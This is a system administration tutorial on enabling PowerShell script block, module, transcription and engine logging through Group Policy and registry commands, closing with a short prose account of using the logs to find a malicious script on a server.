How to Enable PowerShell Logging?

In this tutorial, I will explain how to enable PowerShell logging to improve security and track PowerShell activities on your systems. As a system administrator, I faced challenges in monitoring PowerShell scripts and commands executed across our network. Enabling PowerShell logging will help you secure our infrastructure and detect potential threats.

Types of PowerShell Logging

There are several types of PowerShell logging that you can enable:

1. Script Block Logging: Captures the content of all script blocks processed by PowerShell.
2. Module Logging: Records pipeline execution details for selected modules.
3. Transcription Logging: Creates a transcript of all PowerShell activity in a session.
4. Engine Logging: Logs events related to the PowerShell engine, such as start and stop events.

Check out Get Windows Event Logs using PowerShell

Enable PowerShell Script Block Logging

Script block logging is used to capture the detailed content of scripts executed in your environment. There are different methods to enable PowerShell script block logging. Here’s how to enable it:

1. Using Group Policy

• Open Group Policy Management:

Press Win + R, type gpmc.msc, and press Enter.

• Navigate to PowerShell Settings:
  • Go to Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell.

• Enable Script Block Logging:
  • Double-click on Turn on PowerShell Script Block Logging.
  • Select Enabled and click OK.

2. Using PowerShell Cmdlets

Alternatively, you can enable script block logging using PowerShell commands. Below is the complete PowerShell script.

Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1

This command modifies the registry to enable script block logging.

Read Retrieve Your Windows Product Key Using PowerShell

Enable Module Logging

Module logging provides detailed information about the execution of commands within specific modules. Here’s how to enable it:

1. Using Group Policy

1. Open Group Policy Management:
   • Press Win + R, type gpmc.msc, and press Enter.
2. Navigate to PowerShell Settings:
   • Go to Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell.
3. Enable Module Logging:
   • Double-click on Turn on Module Logging.
   • Select Enabled and specify the modules you want to log in the Options section. For example, you can add modules like Microsoft.PowerShell.Management and Microsoft.PowerShell.Utility.

2. Using PowerShell Cmdlets

To enable module logging via PowerShell, you can use the below PowerShell script.

Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging" -Name "EnableModuleLogging" -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames" -Name "*" -Value "*"

This enables logging for all modules.

Read Find Installed Software Using PowerShell

Enable PowerShell Transcription Logging

Transcription logging creates a text record of all PowerShell activities, including commands and output. Here’s how to enable it:

1. Using Group Policy

1. Open Group Policy Management:
   • Press Win + R, type gpmc.msc, and press Enter.
2. Navigate to PowerShell Settings:
   • Go to Computer Configuration > Administrative Templates > Windows Components > Windows PowerShell.
3. Enable Transcription Logging:
   • Double-click on Turn on PowerShell Transcription.
   • Select Enabled and specify the output directory for the transcripts. For example, you can set it to C:\PowerShellTranscripts.

2. Using PowerShell Cmdlets

To enable transcription logging via PowerShell:

Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "EnableTranscripting" -Value 1
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -Name "OutputDirectory" -Value "C:\PowerShellTranscripts"

This configures transcription logging and sets the output directory.

Read Enable WinRM (Windows Remote Management) Using PowerShell

Enable PowerShell Engine Logging

Engine logging captures events related to the PowerShell engine, such as start and stop events. Here’s how to enable it:

1. Using Event Viewer

Follow the below steps to enable PowerShell engine logging using event viewer.

1. Open Event Viewer:
   • Press Win + R, type eventvwr.msc, and press Enter.
2. Navigate to PowerShell Logs:
   • Go to Applications and Services Logs > Microsoft > Windows > PowerShell > Operational.
3. Enable Logging:
   • Right-click on Operational and select Enable Log.

2. Using PowerShell Cmdlets

To enable engine logging via PowerShell, you can use the below cmdlet.

wevtutil sl Microsoft-Windows-PowerShell/Operational /e:true

This command enables the PowerShell Operational log.

Read Enable Remote Desktop Using PowerShell

Review PowerShell Logs

Once you have enabled PowerShell logging, you can review the logs using Event Viewer or a SIEM solution. Here’s how to access the logs in Event Viewer:

1. Open Event Viewer:
   • Press Win + R, type eventvwr.msc, and press Enter.
2. Navigate to PowerShell Logs:
   • Go to Applications and Services Logs > Microsoft > Windows > PowerShell.
3. Review the Logs:
   • Examine the Operational and Admin logs for detailed information about PowerShell activities.

Read How to Set Proxy in PowerShell?

Practical Example: Detect Malicious PowerShell Activity

Let’s consider a practical example where PowerShell logging helped detect and mitigate a security threat.

In our organization, we noticed unusual network activity originating from a server named US-Server01. By enabling PowerShell logging, we were able to track down the source of the activity.

Below are steps you can follow to track this malicious PowerShell activity.

1. Enable Script Block Logging:
   • We enabled script block logging using Group Policy to capture the content of executed scripts.
2. Review Logs:
   • Using Event Viewer, we reviewed the PowerShell Operational logs and found a suspicious script block attempting to download and execute a remote script.
3. Investigate and Mitigate:
   • We isolated US-Server01 and analyzed the script block. It turned out to be a malicious script attempting to establish a reverse shell.
   • We removed the malicious script and implemented additional security measures to prevent future incidents.

Conclusion

Once you enable PowerShell logging, you can detect and respond to the threat promptly, preventing potential damage to our network. By capturing detailed logs of PowerShell activities, you can monitor, audit, and respond to suspicious behavior effectively. I hope you now understand how to enable PowerShell logging.

You may also like:

• Get and Set Window Size in PowerShell

Bijay Kumar

Bijay Kumar is an esteemed author and the mind behind PowerShellFAQs.com, where he shares his extensive knowledge and expertise in PowerShell, with a particular focus on SharePoint projects. Recognized for his contributions to the tech community, Bijay has been honored with the prestigious Microsoft MVP award. With over 15 years of experience in the software industry, he has a rich professional background, having worked with industry giants such as HP and TCS. His insights and guidance have made him a respected figure in the world of software development and administration. Read more.